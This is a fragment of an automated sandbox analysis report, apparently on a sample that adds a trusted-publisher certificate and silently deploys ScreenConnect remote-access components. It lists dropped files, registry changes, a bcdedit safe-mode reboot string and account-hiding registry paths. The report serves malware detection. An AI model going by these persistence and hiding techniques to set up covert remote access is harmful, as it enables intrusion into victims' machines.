                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0459000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769348036.000000001C272000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1746175127.000000000011D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0459000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769348036.000000001C272000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD045E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1754070448.0000000003192000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD02A8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1751788668.0000000004F72000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Qjq85KfhBC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: Qjq85KfhBC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: Qjq85KfhBC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: Qjq85KfhBC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: Qjq85KfhBC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.drStatic PE information: 0xBC0F508C [Tue Dec 24 14:17:48 2069 UTC]
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00911000
                  Source: Qjq85KfhBC.exeStatic PE information: real checksum: 0x212e6 should be: 0x20464
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911BC0 push ecx; ret 0_2_00911BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFDBD2A5 pushad ; iretd 1_2_00007FF7BFDBD2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFED00BD pushad ; iretd 1_2_00007FF7BFED00C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFED7D00 push eax; retf 1_2_00007FF7BFED7D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFF08BD8 pushad ; iretd 1_2_00007FF7BFF08BD9
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFED845E push eax; ret 1_2_00007FF7BFED846D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF7BFED842E pushad ; ret 1_2_00007FF7BFED845D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF7BFED00BD pushad ; iretd 10_2_00007FF7BFED00C1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF7BFED7569 push ebx; iretd 10_2_00007FF7BFED756A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF7BFEEC522 pushad ; ret 10_2_00007FF7BFEEC523
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 12_2_05720C11 push eax; ret 12_2_05720C1D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 12_2_0574E401 pushad ; ret 12_2_0574E413
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7BFEC00BD pushad ; iretd 13_2_00007FF7BFEC00C1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01DDC1D push ebx; ret 13_2_00007FF7C01DDE5A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01D5302 pushad ; ret 13_2_00007FF7C01D5311
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01E23F3 push eax; retf 13_2_00007FF7C01E2759
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01DDD1A push ebx; ret 13_2_00007FF7C01DDE5A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01D2EC6 push ss; retf 13_2_00007FF7C01D2EC7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF7C01E20D1 push eax; retf 13_2_00007FF7C01E2759
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe
                  Source: ScreenConnect.ClientService.dll.1.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (ae095c23-8e22-4747-b9a0-c8c8b34ba57d)

                  Hooking and other Techniques for Hiding and Protection

                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769348036.000000001C272000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.1751348890.00000000028B2000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.1801490320.0000000000A00000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.1801752921.0000000002371000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 21CD0040000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 21CE8220000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1530000 memory reserve | memory write watchJump to behavior
